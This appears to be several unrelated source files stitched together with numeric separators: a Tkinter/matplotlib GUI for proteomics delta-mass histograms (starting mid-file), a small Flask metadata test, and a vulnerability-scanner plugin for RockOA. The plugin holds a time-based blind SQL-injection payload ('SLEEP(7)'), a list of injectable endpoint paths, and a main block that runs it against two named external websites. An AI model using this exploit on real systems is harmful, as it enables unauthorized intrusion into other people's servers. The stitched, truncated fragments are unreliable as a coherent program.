''' A DeltaMassHistogram object tracks information needed to plot deltamasshistogram data, including
the textstring to display, the matplotlib, plot itself, the plot widget, x ranges, the placement of
the vertical bar, the placement of curve fitting information, and a pointer to the original object
storing numpy data (histogram).
It is a subclass of histogram, so any functions not present here will default to histogram's functions. Most
functions required custom implementations. Subclassing allows for function ovverriding, however, which makes for
easier calls to things like setting the placement of the vertical selection bar from outside of the class (the function
implementation will vary based on whether the histogram is a score or mass histogram, but outside the interface the call is the same)'''
def __init__(self, h, notebook, FULL_RANGE = False):
self.histogram = h # Original histogram data
self.notebook = notebook # The notebook the plot resides in
self.ln = self.initLn() # The current line in the text file
self.z = h.z
self.dm = h.dm
self.plot = None # The figure to plot
self.target = None
self.decoy = None # Currently tracking target and decoy plots to get data for zoom
self.xmin = None # For plotting x axis
self.xmax = None # For plotting x axis
self.vertLine = None # The moving green vertical line
self.textString = '' # The string to plot
self.headerString = '' # The first title line above the large string
self.FULL_RANGE = FULL_RANGE # Full range plot
self.zoomFactor = 2 # Factor by which to zoom plots
# 0 = low or left DM, 1 = high or right DM
self.currentDM = 0 # Tracks the current threshold being modified (left or right)
self.histogram.sparseData = False # for histogram/dmhistogram issues, remove later
self.makeTextString()
self.makePlot()
def makeTextString(self):
'''
Builds the text string to display as data
'''
from io import StringIO
output = StringIO()
self.textString = self.histogram.histo.to_string(buf=output, index=False, col_space=12)
self.textString = output.getvalue()
output.close()
splitString = self.textString.split('\n')
self.textString = '\n'.join(splitString[1:])
self.headerString = splitString[0]
def makePlot(self):
'''
Builds the dm plots
'''
self.plot = Figure(figsize=(5,3), dpi=100)
target = self.plot.add_subplot(111)
decoy = self.plot.add_subplot(111)
if self.dm == 0:
target.set_xlim(-0.05, 0.05)
decoy.set_xlim(-0.05, 0.05)
self.xmin = -0.05
self.xmax = 0.05
Forward = self.histogram.forwardDeltaMassZero
Reverse = self.histogram.reverseDeltaMassZero
smForward = self.histogram.smForwardDeltaMassZero
smReverse = self.histogram.smReverseDeltaMassZero
mybins = np.linspace(-0.05, 0.05, 201)
elif self.dm == 1:
target.set_xlim(0.9, 1.1)
decoy.set_xlim(0.9, 1.1)
self.xmin = 0.9
self.xmax = 1.1
Forward = self.histogram.forwardDeltaMassOne
Reverse = self.histogram.reverseDeltaMassOne
smForward = self.histogram.smForwardDeltaMassOne
smReverse = self.histogram.smReverseDeltaMassOne
mybins = np.linspace(0.90, 1.10, 401)
elif self.dm == 'ALL':
self.xmin = -self.histogram.dmRange
self.xmax = self.histogram.dmRange
Forward = self.histogram.forwardDeltaMass
Reverse = self.histogram.reverseDeltaMass
smForward = self.histogram.smForwardDeltaMass
smReverse = self.histogram.smReverseDeltaMass
mybins = self.histogram.mybins
elif self.dm == 2:
self.xmin = -self.histogram.dmRange
self.xmax = self.histogram.dmRange
Forward = self.histogram.forwardDeltaMass
Reverse = self.histogram.reverseDeltaMass
smForward = self.histogram.smForwardDeltaMass
smReverse = self.histogram.smReverseDeltaMass
mybins = self.histogram.mybins
center = (mybins[:-1] + mybins[1:]) / 2
#print('dm:', self.dm)
#print('len y:', len(smForward))
#print('len bins:', len(mybins))
#print('len x:', len(center))
if(self.notebook.plotType.get() == 'Smoothed Plot'):
#target.fill(center, smForward, color='b')
#decoy.fill(center, smReverse, color='r')
target.plot(center, smForward, color='b')
decoy.plot(center, smReverse, color='r')
else:
#target.fill(center, Forward, color='b')
#decoy.fill(center, Reverse, color='r')
target.plot(center, Forward, color='b')
decoy.plot(center, Reverse, color='r')
# Sets up the vertical line to display. Initializes it at the low threshold position.
# Target.axis()[2] and [3] correspond to the current placements of the y-axis, which the line should mirror
greenLine = self.plot.add_subplot(111)
l = greenLine.plot((self.histogram.thresholdLow, self.histogram.thresholdLow), (target.axis()[2], target.axis()[3]), '-g', linewidth = 2.0)
self.vertLine = l[0]
# Sets up the low and high threshold black dotted lines
# Ignores if no low/high thresholds present, like the out region that's not displayed.
if(self.histogram.thresholdLow and self.histogram.thresholdHigh):
low = self.plot.add_subplot(111)
l= low.plot((self.histogram.thresholdLow, self.histogram.thresholdLow), (target.axis()[2], target.axis()[3]), '--k', linewidth = 2.0)
high = self.plot.add_subplot(111)
h = high.plot((self.histogram.thresholdHigh, self.histogram.thresholdHigh), (target.axis()[2], target.axis()[3]), '--k', linewidth = 2.0)
self.low = l[0]
self.high = h[0]
# Set title and axis labels
if(self.dm == 0 or self.dm == 1 or self.dm == 2):
if self.dm != 2:
target.set_title(str(self.dm) + ' Da Delta Mass')
else:
target.set_title('Full Range Delta Mass')
else:
target.set_title('Full range Delta Mass')
target.set_xlabel("Deltamass (Da)")
target.set_ylabel("Counts")
target.set_xlim((self.xmin, self.xmax))
self.plot.tight_layout()
#track these for zooming
self.target = target
self.decoy = decoy
def makePlotWidget(self, frcanvas):
'''
Build the actual tkinter widget and assign callbacks
'''
canvas = BRCanvas(self.plot, master=frcanvas, gui=self.notebook.gui)
canvas.draw()
canvas.get_tk_widget().pack(side=LEFT, fill=BOTH, expand=YES)
canvas.get_tk_widget().bind('<Button-1>', canvas.focusCanvas)
canvas.histogram = self # Retain reference to self
self.can = canvas
canvas.get_tk_widget().bind('<Double-Button-1>', self.zoom)
canvas.get_tk_widget().bind('<Double-Button-3>', self.unZoom)
canvas.get_tk_widget().bind('<Return>', self.setThresh)
canvas.get_tk_widget().bind('<Left>', self.goToLeft)
canvas.get_tk_widget().bind('<Right>', self.goToRight)
def setThresh(self, event):
'''
Sets the threshold when the enter key is pressed depending on whether the left
or right threshold is selected.
'''
if self.currentDM == 0:
self.setLeftDM()
else:
self.setRightDM()
def setLeftDM(self):
'''
Helper method for setThresh. Sets the threshold attribute for left (low) threshold.
'''
self.histogram.thresholdLow = self.histogram.histo['deltaMass'][self.ln-1]
self.low.set_xdata((self.histogram.thresholdLow, self.histogram.thresholdLow))
self.can.draw()
def setRightDM(self):
'''
Helper method for set Thresh. Sets the threshold attribute for right (high) threshold.
'''
self.histogram.thresholdHigh = self.histogram.histo['deltaMass'][self.ln-1]
self.high.set_xdata((self.histogram.thresholdHigh, self.histogram.thresholdHigh))
self.can.draw()
def goToLeft(self, event):
'''
Sets left threshold as active when left arrow key is pressed, and jumps green display line to
that threshold.
'''
self.currentDM = 0
self.vertLine.set_xdata((self.histogram.thresholdLow, self.histogram.thresholdLow))
self.can.draw()
xval = self.histogram.histo[abs(self.histogram.histo['deltaMass'] - self.histogram.thresholdLow) < .0005]
self.ln = xval.index[0]
def goToRight(self, event):
'''
Sets right threshold as active when right arrow key is pressed, and jumps green display line to
that threshold.
'''
self.currentDM = 1
self.vertLine.set_xdata((self.histogram.thresholdHigh, self.histogram.thresholdHigh))
self.can.draw()
xval = self.histogram.histo[abs(self.histogram.histo['deltaMass'] - self.histogram.thresholdHigh) < .0005]
self.ln = xval.index[0]
def zoom(self, event):
ymin, ymax = self.target.get_ylim()
self.target.set_ylim(0, ymax - ymax/(self.zoomFactor))
self.can.draw()
def unZoom(self, event):
ymin, ymax = self.target.get_ylim()
self.target.set_ylim(0, ymax + ymax*(self.zoomFactor))
self.can.draw()
def updateVerticalLine(self):
#print('vertical line method')
#print('len frame:', len(self.histogram.histo))
#print('line:', self.ln)
if self.ln > 1:
xval = self.histogram.histo['deltaMass'][self.ln-1]
else:
xval = self.histogram.histo['deltaMass'][1]
#print('xval:', xval)
self.vertLine.set_xdata((xval, xval))
def setLn(self, val):
'''
Setter for current line position in table
'''
self.ln = val
def initLn(self):
if(self.histogram.thresholdLow and self.histogram.thresholdHigh):
# Setting the deltamass location in the table to the low threshold calculated will fail because the calculated
# number is to a different level of float accuracy, so make sure they're within less than five thousandths of each other.
xval = self.histogram.histo[abs(self.histogram.histo['deltaMass'] - self.histogram.thresholdLow) < .0005]
if xval.empty: # If there's no location for low threshold, just set to 1. Probably will happen for all
return 1 # low mass data
else:
return xval.index[0]
else:
return 1
class BRNotebook(ttk.Notebook):
''' BRNotebook manages a ttk notebook object'''
def __init__(self, gui=None, container = [], plotType = '', **args):
ttk.Notebook.__init__(self, **args)
self.histograms = {} # Dictionary of histograms
self.deltaMassHistograms = {} # Dictionary of histograms
self.fr = None # main frame
self.gui = gui # reference to main GUI object
self.container = container.container # container of histogram data to process
self.containerDeltaMass = container.dmContainer # container of delatamass histograms
self.containerStats = container.globalStats
self.rawContainer = container # This is just a pointer back to the main containe - it has list and flag information
#self.txtStats = container.txtStats
self.plotType = plotType # Smoothed or not
self.setup_deltaMass() # First setup deltamass plots by default.
#self.setup() # initialization function to set up view...
#self.setup_stats()
def saveDMFigures(self):
'''
Save dm pdf figures
'''
sqt_container = os.path.dirname(os.getcwd()) # assumes we have set location to the folder with SQT files
filter_container = os.path.join(sqt_container, 'filtered_files') # put the threshold figures in the filtered_files folder
self.fig_container = os.path.join(filter_container, 'ThresholdFigures') # put the threshold figures in the filtered_files folder
if not os.path.exists(filter_container):
os.mkdir(filter_container)
if not os.path.exists(self.fig_container):
os.mkdir(self.fig_container)
for figs in self.deltaMassHistograms.values():
for fig in figs: # using relative folder paths
fig_file_name = os.path.join(self.fig_container, 'Mass_Figure_dm=' + str(fig.dm) + '_z=' + str(fig.z) + '.pdf')
fig.plot.savefig(fig_file_name)
def saveScoreFigures(self):
'''
Save score pdf figures (we have already set up folder for DM figures)
'''
for figs in self.histograms.values():
for fig in figs:
fig_file_name = os.path.join(self.fig_container, 'Score_Figure_dm=' + str(fig.histogram.dm) + '_z=' + str(fig.z) +
'_ntt=' + str(fig.ntt) + '_mod=' + str(fig.histogram.mod) + '.pdf')
fig.plot.savefig(fig_file_name)
def setup(self):
'''
Setup score view
'''
# remove deltamass tabs from window
for tab in self.tabs():
self.forget(tab)
# Create names for dm windows to reference when building tabs
if self.rawContainer.accurateMass:
daWindow = {0: '0 Da', 1: '1 Da', 2: 'out'}
else:
daWindow = {0: 'All'}
# Loop through score data and set up the canvases
for dm, dmFig in enumerate(self.container):
for f, fig in enumerate(dmFig):
theZ = self.rawContainer.zList[f] # get z value for place in list
# set up canvases
self.fr = Frame(self.gui.root) # self.fr is a large canvas for the whole tab
frcanvas = Frame(self.fr) # frcanvas is a frame for the entire mod notebook on top of the textview
nb = ttk.Notebook(frcanvas) # notebook to hold each mod
frames = {}
for mod in self.rawContainer.modList:
frames[mod] = Frame() # Make a frame for each mod
for fig in fig: # Loops over ntt
for fig in fig: # loops over mod
h = Histogram(fig, self)
h.makePlotWidget(frames[fig.mod]) # add plot to frame for specific mod
if f not in self.histograms:
self.histograms[f] = [h]
else:
self.histograms[f].append(h)
for frcan in frames:
string = frcan
if frcan == ' ': #
string = 'Unmod' # I think this if is no longer needed - unmod is set in loading_TXT_files...
nb.add(frames[frcan], text = string) # add each mod frame to notebook as seperate tab
nb.pack(side=TOP, expand=YES, fill=BOTH)
frcanvas.pack(side=TOP, expand=YES, fill=BOTH)
self.add(self.fr, text = (theZ, '+', '_', str(daWindow[dm]))) # Add the whole frame with textview and canvases to main notebook
histPointer = h
# Now set up the text view
# Get just header line
headerString = histPointer.headerString
# set up header text view
frtext = Frame(self.fr) # Add text view as a frame in the frame holding frcanvas (the canvases notebook) and the text view
text = Text(frtext, relief=SUNKEN)
text.insert('1.0', headerString)
text.pack(side=TOP, expand=NO, fill=X)
text.config(width=1, height=1)
text['wrap'] = 'none'
text['state'] = 'disabled'
# Set up main text view
textString = histPointer.textString
text = BRText(frtext, relief=SUNKEN, notebook=self, gui=self.gui)
text.insert('1.0', textString)
text.focus()
text.bind('<Button-1>', text.select)
text.bind('<Up>', text.upKey)
text.bind('<Down>', text.downKey)
text.bind('<Return>', text.setThresh)
text.pack(side=LEFT, expand=YES, fill=BOTH)
text['state'] = 'disabled' # prevents text editing
text['wrap'] = 'none'
sbar = Scrollbar(frtext)
sbar.config(command=text.yview)
text.config(yscrollcommand=sbar.set)
sbar.pack(side=RIGHT, fill=Y)
hbar = Scrollbar(frtext, orient='horizontal')
hbar.config(command=text.xview)
text.config(xscrollcommand=hbar.set)
hbar.pack(side=BOTTOM, fill=X)
frtext.pack(side=BOTTOM, expand=YES, fill=BOTH)
for histo in self.histograms[f]:
if histo.histogram.dm == daWindow[dm]:
histo.can.text = text # Add pointer to current text view in canvas
text.canvas = histo.can # Keep pointer to canvas in text view
text.see("%d.0" % text.canvas.histogram.ln) # Go to current set line
text.refreshView()
def setup_deltaMass(self):
import pprint
for f in range(len(self.containerDeltaMass[0])):
self.fr = Frame(self.gui.root)
plotsContainer = Frame(self.fr)
plotsContainer.pack(side=TOP, expand=YES, fill=BOTH)
frcanvas = Frame(plotsContainer)
bottom_fr = Frame(plotsContainer)
frcanvas.pack(side=TOP, expand=YES, fill=X)
bottom_fr.pack(side=BOTTOM, expand=YES, fill=X)
for x, fig in enumerate(self.containerDeltaMass):
# set up canvases
# Since there's nothing in the container for full mass range, at the end of the list,
# make an extra plot for full mass range ONLY if data has accurate mass. The low mass
# container will only have 1 plot, the full range plot, so no need in that case.
if self.gui.ACCURATE_MASS and x == (len(self.containerDeltaMass) - 1):
h = DeltaMassHistogram(fig[f], self, FULL_RANGE=True)
h.makePlotWidget(frcanvas)
else:
h = DeltaMassHistogram(fig[f], self)
h.makePlotWidget(bottom_fr)
if f not in self.deltaMassHistograms:
self.deltaMassHistograms[f] = [h]
else:
self.deltaMassHistograms[f].append(h)
# Get just header line
headerString = self.deltaMassHistograms[f][len(self.deltaMassHistograms[f])-1].headerString
# set up related text view
frtext = Frame(self.fr)
text = Text(frtext, relief=SUNKEN)
text.insert('1.0', headerString)
text.pack(side=TOP, expand=NO, fill=X)
text.config(width=1, height=1)
text['wrap'] = 'none'
text['state'] = 'disabled'
textString = self.deltaMassHistograms[f][len(self.deltaMassHistograms[f])-1].textString
text = BRText(frtext, relief=SUNKEN, notebook=self, gui=self.gui)
text.insert('1.0', textString)
#text.tag_add(SEL, '1.0', '1.200')
text.focus()
text.bind('<Button-1>', text.select)
text.bind('<Up>', text.upKey)
text.bind('<Down>', text.downKey)
text.bind('<Return>', text.setThresh)
text.bind('<Left>', text.goToLeft)
text.bind('<Right>', text.goToRight)
text.pack(side=LEFT, expand=YES, fill=BOTH)
text['wrap'] = 'none'
text['state'] = 'disabled' # prevents text editing
sbar = Scrollbar(frtext)
sbar.config(command=text.yview)
text.config(yscrollcommand=sbar.set)
sbar.pack(side=RIGHT, fill=Y)
hbar = Scrollbar(frtext, orient='horizontal')
hbar.config(command=text.xview)
text.config(xscrollcommand=hbar.set)
hbar.pack(side=BOTTOM, fill=X)
frtext.pack(side=BOTTOM, expand=YES, fill=BOTH)
for histo in self.deltaMassHistograms[f]:
histo.can.text = text
text.canvas = histo.can
#if not text.canvas.histogram.ln:
# continue
text.see("%d.0" % text.canvas.histogram.ln)
text.refreshView()
theZ = self.rawContainer.zList[f]
self.add(self.fr, text = (theZ, '+_DM'))
f += 1
def setup_stats(self):
self.fr = Frame(self.gui.root)
statsContainer = Frame(self.fr)
Label(statsContainer, text = '1+ Target\t').grid(column = 1, row = 0)
Label(statsContainer, text = '1+ Decoy\t').grid(column = 2, row = 0)
Label(statsContainer, text = '2+\t').grid(column = 3, row = 0)
Label(statsContainer, text ='2+\t').grid(column = 4, row = 0)
Label(statsContainer, text ='3+\t').grid(column = 5, row = 0)
Label(statsContainer, text ='3+\t').grid(column = 6, row = 0)
Label(statsContainer, text ='4+\t').grid(column = 7, row = 0)
Label(statsContainer, text ='4+\t').grid(column = 8, row = 0)
Label(statsContainer, text ='Unmod').grid(column = 0, row = 1)
Label(statsContainer, text ='Full').grid(column = 0, row = 2)
DM = len(self.containerDeltaMass) - 1
NTT = len(self.container[0][0])
if(NTT == 3):
for z in range(len(self.containerDeltaMass[0])):
Label(statsContainer, text = str(self.containerStats.target_subclass[DM][z][0][0])).grid(column = z+1, row = 2)
Label(statsContainer, text = str(self.containerStats.decoy_subclass[DM][z][0][0])).grid(column = z+2, row = 2)
Label(statsContainer, text ='Semi').grid(column = 0, row = 3)
for z in range(len(self.containerDeltaMass[0])):
Label(statsContainer, text = str(self.containerStats.target_subclass[DM][z][1][0])).grid(column = z+1, row = 3)
Label(statsContainer, text = str(self.containerStats.decoy_subclass[DM][z][1][0])).grid(column = z+2, row = 3)
Label(statsContainer, text ='Non').grid(column = 0, row = 4)
for z in range(len(self.containerDeltaMass[0])):
Label(statsContainer, text = str(self.containerStats.target_subclass[DM][z][2][0])).grid(column = z+1, row = 4)
Label(statsContainer, text = str(self.containerStats.decoy_subclass[DM][z][2][0])).grid(column = z+2, row = 4)
if(NTT < 3):
for z in range(len(self.containerDeltaMass[0])):
Label(statsContainer, text = str(self.containerStats.target_subclass[DM][z][0][0])).grid(column = z+1, row = 2)
Label(statsContainer, text = str(self.containerStats.decoy_subclass[DM][z][0][0])).grid(column = z+2, row = 2)
Label(statsContainer, text ='Semi').grid(column = 0, row = 3)
for z in range(len(self.containerDeltaMass[0])):
Label(statsContainer, text = str(self.containerStats.target_subclass[DM][z][1][0])).grid(column = z+1, row = 3)
Label(statsContainer, text = str(self.containerStats.decoy_subclass[DM][z][1][0])).grid(column = z+2, row = 3)
Label(statsContainer, text ='Non').grid(column = 0, row = 4)
for z in range(len(self.containerDeltaMass[0])):
Label(statsContainer, text = "----------").grid(column = z+1, row = 4)
Label(statsContainer, text = "----------").grid(column = z+2, row = 4)
Label(statsContainer, text ='Totals').grid(column = 0, row = 5)
Label(statsContainer, text = self.containerStats.target_filtered).grid(column = 1, row = 5)
Label(statsContainer, text = self.containerStats.decoy_filtered).grid(column = 3, row = 5)
statsContainer.pack()
self.add(self.fr, text = 'Stats')
class BRCanvas(FigureCanvasTkAgg):
''' Manages a FigureCanvasTkAgg object '''
def __init__(self, parent=None, gui=None, **args):
FigureCanvasTkAgg.__init__(self, parent, **args)
self.text = None # Associated text view
self.ntt = 0 # Ntt for canvas
self.charge = 0 # Charge for canvas
self.gui = gui # Reference to main gui object
self.histogram = None
def focusCanvas(self, event):
''' Sets focus to current canvas and updates text view '''
self.text.canvas = self
self.text['state'] = 'normal'
self.text.focus()
self.text.delete('0.0', END)
self.text.insert('1.0', self.histogram.textString)
self.text.see("%d.0" % self.text.canvas.histogram.ln)
#self.text.tag_remove(SEL, '0.0', END)
self.text.tag_remove('highlight', '0.0', END)
self.text.tag_add('highlight', "%d.0" % self.text.canvas.histogram.ln, "%d.0" % (self.text.canvas.histogram.ln + 1))
self.text.tag_configure('highlight', background = 'sky blue')
#self.text.tag_add(SEL, "%d.0" % self.text.canvas.histogram.ln, "%d.0" % (self.text.canvas.histogram.ln + 1))
self.text['state'] = 'disabled'
self.get_tk_widget().focus_set()
return 'break'
class BRText(Text):
''' Manages a text view object '''
def __init__(self, parent=None, notebook=None, gui=None, **args):
Text.__init__(self, parent, takefocus=0, **args)
self.canvas = None # Associated canvas
self.notebook = notebook # Reference to notebook textview is in
self.gui = gui # Reference to main GUI object
def refreshView(self):
''' Helper method, updates figure for text view and redraws canvas '''
#self.tag_remove(SEL, '0.0', END)
#self.tag_add(SEL, "%d.0" % self.canvas.histogram.ln, "%d.0" % (self.canvas.histogram.ln + 1))
self.tag_remove('highlight', '0.0', END)
self.tag_add('highlight', "%d.0" % self.canvas.histogram.ln, "%d.0" % (self.canvas.histogram.ln + 1))
self.tag_configure('highlight', background = 'sky blue')
self.focus()
# Updates differently depending on whether class is deltamass or score histogram
self.canvas.histogram.updateVerticalLine()
self.canvas.draw()
def select(self, event):
''' Callback for selection of textview line with mouse'''
self.canvas.histogram.setLn(int(self.index(CURRENT).split('.')[0])) # Gets just the line number
self.refreshView()
return 'break' # 'break' overrides widget's default behavior
def upKey(self, event):
''' Callback for selection of textview line with upKey'''
self.canvas.histogram.setLn(int(self.canvas.histogram.ln) - 1)
self.see("%d.0" % self.canvas.histogram.ln)
self.refreshView()
return 'break' # 'break' overrides widget's default behavior
def downKey(self, event):
''' Callback for selection of textview line with downKey'''
self.canvas.histogram.setLn(int(self.canvas.histogram.ln) + 1)
self.see("%d.0" % self.canvas.histogram.ln)
self.refreshView()
return 'break' # 'break' overrides widget's default behavior
def setThresh(self, event):
self.canvas.histogram.setThresh(event)
return 'break'
def goToRight(self, event):
self.canvas.histogram.goToRight(event)
return 'break'
def goToLeft(self, event):
self.canvas.histogram.goToLeft(event)
return 'break'
class GUI:
''' Manages the main GUI window.
Also starts parsing in files, loading pandas structures'''
def __init__(self, folder=None):
self.root = Tk()
self.root.title('PAW Histogram GUI')
if not folder:
folder = os.getcwd()
self.folder = folder
# this is the starter window
self.modal = Toplevel(self.root)
self.modal.geometry("%dx%d%+d%+d" % (300, 200, 250, 125))
self.modal.title('PAW Set Up Dialog')
ttk.Button(self.modal, text="Select Top Hit Summary Files", command=self.select_files).pack(pady=5)
variable = StringVar(self.modal)
variable.set("Plot") # default value
ttk.OptionMenu(self.modal, variable, "Standard Plots", "Smoothed Plots").pack(pady=5)
self.massAccuracy = StringVar(self.modal)
self.massAccuracy.set("High") # default value (gets over-written during file loading)
ttk.OptionMenu(self.modal, self.massAccuracy, "High Resolution", "Low Resolution").pack(pady=5)
ttk.Button(self.modal, text="Load and Plot Histograms", command=self.exit_modal).pack(pady=5)
self.root.protocol('WM_DELETE_WINDOW', self.onExit) # handle exit
self.modal.protocol('WM_DELETE_WINDOW', self.exit_modal) # cannot get setup window to delete on mac
self.root.withdraw()
self.modal.attributes('-topmost', 1)
# self.modal.attributes('-topmost', 0)
self.root.wait_window(self.modal) # this waits for the user to set the files, resolution, etc.
self.root.deiconify()
# when we get here, we are starting the histogramming
# Setup flags
self.sparseDiscScore = 100.0
self.ACCURATE_MASS = True
self.SMOOTHED = True
if self.massAccuracy.get() == 'Low Resolution':
self.ACCURATE_MASS = False
if variable.get() == 'Plot':
self.SMOOTHED = False
# Make histograms
self.container = FigureGenerator(files=self.txt_files, accurateMass=self.ACCURATE_MASS, smoothed=self.SMOOTHED)
print('Generating GUI...')
# Main frames
self.buttonFrame = Frame(self.root)
self.buttonFrame.pack(side=TOP, fill=X)
self.computeScoreHistograms = ttk.Button(self.buttonFrame, text = 'Compute Score Histograms', takefocus=0, command=self.compute_score_histograms)
self.computeScoreHistograms.pack(side=LEFT, padx=5, pady=2)
ttk.Button(self.buttonFrame, text = 'Show mass windows', takefocus=0, command=self.get_masses).pack(side=LEFT, padx=5, pady=2)
self.notebook = BRNotebook(gui=self, container=self.container, plotType = variable, takefocus=0)
self.notebook.pack(side=BOTTOM)
#f = Frame(self.root)
#Label(f, text = 'Sidebar: Additional widgets here...').pack()
#f.pack(side=BOTTOM)
mainloop()
def onExit(self):
import sys
"""Properly closes down the GUI program."""
self.root.withdraw()
self.root.update_idletasks()
self.root.destroy()
sys.exit()
def pickleDeltaMass(self):
with open("output.pkl", "wb") as fout:
pickle.dump(self.container, fout)
def pickleScore(self):
with open("output_scores.pkl", "wb") as fout:
pickle.dump(self.container, fout)
def exit_modal(self):
self.modal.withdraw()
self.modal.update_idletasks()
self.modal.destroy()
def select_files(self):
self.txt_files = PAW_lib.get_files(self.folder, [('Text files', '*.txt'), ('PAW Text files', '*.PAW.txt')],
'Select the Top-hit TXT files') # returns full paths
if not self.txt_files: sys.exit() # cancel button response
self.folder = os.path.dirname(self.txt_files[0])
os.chdir(self.folder)
def get_scores(self):
s = ''
for score in self.container.container:
for score in score:
for score in score:
for score in score:
s += (str(score.dm) + " , "
+ str(score.z) + " +, "
+ str(score.ntt) + " tt, "
+ str(score.mod) + " mod: ")
if(score.sparseData):
s += str(100) + '\n'
else:
s += ('%0.4f' % score.histo.DiscScore[score.threshold]) + '\n'
messagebox.showinfo(title = "Scores", message = s)
#self.get_stats()
def get_masses(self):
s = ''
for dm in range(len(self.container.dmList)):
for z in range(len(self.container.zList)):
if dm == 2:
s += '\n' + ('%d' % self.container.dmContainer[dm][z].z) + "+ , " + " Outside"
s += "\n\tLow: " + ('%0.4f' % -self.container.dmContainer[dm][z].dmRange) + " \n\tHigh: " + ('%0.4f' % self.container.dmContainer[dm][z].dmRange)
elif dm == 0 or dm == 1:
s += '\n' + ('%d' % self.container.dmContainer[dm][z].z) + "+ , " + ('%d' % self.container.dmContainer[dm][z].dm) + " Da"
s += "\n\tLow: " + ('%0.4f' % self.container.dmContainer[dm][z].thresholdLow) + " \n\tHigh: " + ('%0.4f' % self.container.dmContainer[dm][z].thresholdHigh)
messagebox.showinfo(title = "Mass Thresholds", message = s)
def compute_score_histograms(self):
self.container.regenerateScorePlots()
self.notebook.setup()
ttk.Button(self.buttonFrame, text = 'Show score thresholds', takefocus=0, command=self.get_scores).pack(side=LEFT, padx=5, pady=2)
ttk.Button(self.buttonFrame, text = 'Filter Data', takefocus=0, command=self.exportToFilterer).pack(side=LEFT, padx=5, pady=2)
self.computeScoreHistograms['state'] = 'disabled'
# Save figures
self.notebook.saveDMFigures()
def get_stats(self):
self.container.get_stats_helper()
def exportToFilterer(self):
import time
filterer = DataInfoAndFilter(self.folder, self.container.f.getFrame(), self.container.txtObjects,
self.container.dmList, self.container.zList, self.container.nttList, self.container.specialCharsList,
self.container.minLength, self.container.maxMods, self.container.peptideMassTol)
filterer.get_pre_stats()
masses = [[Threshold() for dm in self.container.dmList] for z in self.container.zList]
for dm in range(len(self.container.dmList)):
for z in range(len(self.container.zList)):
if(dm == 2):
masses[z][dm].low = -1 * self.container.dmContainer[dm][z].dmRange
masses[z][dm].high = self.container.dmContainer[dm][z].dmRange
else:
masses[z][dm].low = self.container.dmContainer[dm][z].thresholdLow
masses[z][dm].high = self.container.dmContainer[dm][z].thresholdHigh
scores = [[[[100.0 for mod in self.container.specialCharsList] for ntt in self.container.nttList] for z in self.container.zList] for dm in self.container.dmList]
for dm in range(len(self.container.dmList)):
for z in range(len(self.container.zList)):
for ntt in range(len(self.container.nttList)):
for mod in range(len(self.container.specialCharsList)):
ref = self.container.container[dm][z][ntt][mod]
if ref.sparseData:
scores[dm][z][ntt][mod] = self.sparseDiscScore
else:
scores[dm][z][ntt][mod] = ref.histo.DiscScore[ref.threshold]
filter_frame = filterer.filter_with_stats(masses, scores) # probably do not need to have a returned dataframe
filterer.copy_params_files()
for obj in filterer.write:
print('\n...finished.', time.asctime(), file=obj)
filterer.log_file.close()
# Save figures
self.notebook.saveScoreFigures()
def _quit(self):
root.quit() # stops mainloop
root.destroy() # this is necessary on Windows to prevent
# Fatal Python Error: PyEval_RestoreThread: NULL tstate
#########################
# default folder location
folder = os.getcwd() # this is a safe default
folder = "E:" # or set to something useful for your system
#########################
gui = GUI(folder)
| 50,116 | 15,639 |
#!/usr/bin/env python
"""Test add_metadata_route function with legal parameters.
"""
import apikit
from flask import Flask
def test_set_flask_metadata():
"""Test metadata creation with legal parameters.
"""
app = Flask("bob")
apikit.set_flask_metadata(app, "2.0", "http://example.repo", "BobApp")
apikit.add_metadata_route(app, "")
apikit.add_metadata_route(app, "bob")
apikit.add_metadata_route(app, ["bob"])
apikit.add_metadata_route(app, ["bob", "chuck"])
| 493 | 177 |
#/usr/bin/python
#-*- coding: utf-8 -*-
#Refer: 0day 这么多注入总有一个适合你
import time
def assign(service, arg):
if service == "rockoa":
return True, arg
def test_inj_get(url):
payload = "' AND (SELECT * FROM (SELECT(SLEEP(7)))MDqI) AND 'geIm'='geIm"
verify = url + payload
time1 = time.time()
code, head, res, errcode, _ = curl.curl2(url)
time2 = time.time()
code, head, res, errcode, _ = curl.curl2(verify)
time3 = time.time()
code, head, res, errcode, _ = curl.curl2(url)
time4 = time.time()
if abs((time3 - time2) - (time2 - time1)) - abs((time2 - time1) - (time4 - time3)) >= 7:
return True
else:
return False
def test_inj_post(url, data):
payload = "' AND (SELECT * FROM (SELECT(SLEEP(7)))MDqI) AND 'geIm'='geIm"
verify_data = data + payload
time1 = time.time()
code, head, res, errcode, _ = curl.curl2(url=url, post=data)
time2 = time.time()
code, head, res, errcode, _ = curl.curl2(url=url, post=verify_data)
time3 = time.time()
code, head, res, errcode, _ = curl.curl2(url=url, post=data)
time4 = time.time()
if abs((time3 - time2) - (time2 - time1)) - abs((time2 - time1) - (time4 - time3)) >= 6:
return True
else:
return False
def audit(arg):
payloads = [
'rock.php?a=default&d=webim&m=index&ajaxbool=false&uid=1',
'rock.php?a=getuserone&d=webim&m=index&ajaxbool=true&sholauid=1',
'rock.php?a=createlun&d=webim&m=index&ajaxbool=true&aid=1',
'rock.php?a=check&d=webim&m=login&ajaxbool=true&adminuser=1',
'rock.php?a=getlist&d=taskrun&m=work&ajaxbool=true|dt=12',
'rock.php?a=yaoqinguid&d=webim&m=group&ajaxbool=true|val=1',
'rock.php?a=save&d=webim&m=group&ajaxbool=true|receid=1',
'rock.php?a=check&d=taskrun&m=flow&ajaxbool=true|flownum=1',
'rock.php?a=adduser&d=webim&m=guan&ajaxbool=true|val=1&gid=1',
'rock.php?a=save&d=webim&m=user&ajaxbool=true|receid=122',
'rock.php?a=fenxi&d=taskrun&m=kaoqin&ajaxbool=true',
'rock.php?a=default&d=webim&m=index&ajaxbool=false&uid=1',
'rock.php?a=getuserone&d=webim&m=index&ajaxbool=true&sholauid=1',
'rock.php?a=data&d=webim&m=record&ajaxbool=true&atype=user',
'rock.php?a=view&d=taskrun&m=flow&ajaxbool=false&uid=1&mid=1&modenum=1',
]
for payload in payloads:
url = arg + payload
if len(payload.split('|')) == 2:
if test_inj_post(url.split('|')[0], payload.split('|')[1]) == True:
security_hole(url.split('|')[0] + '(post data ' + payload.split('|')[1] + ') sql injection!')
return
if len(payload.split('|')) == 1:
if test_inj_get(url) == True:
security_hole(url + ' sql injection!')
return
if __name__ == '__main__':
from dummy import *
audit(assign('rockoa', 'http://www.jingkelai.com/jingkelaioa/')[1])
audit(assign('rockoa', 'http://www.ihkda.com/hg/')[1]) | 3,096 | 1,261 |
from flask import render_template
from flask_mail import Message
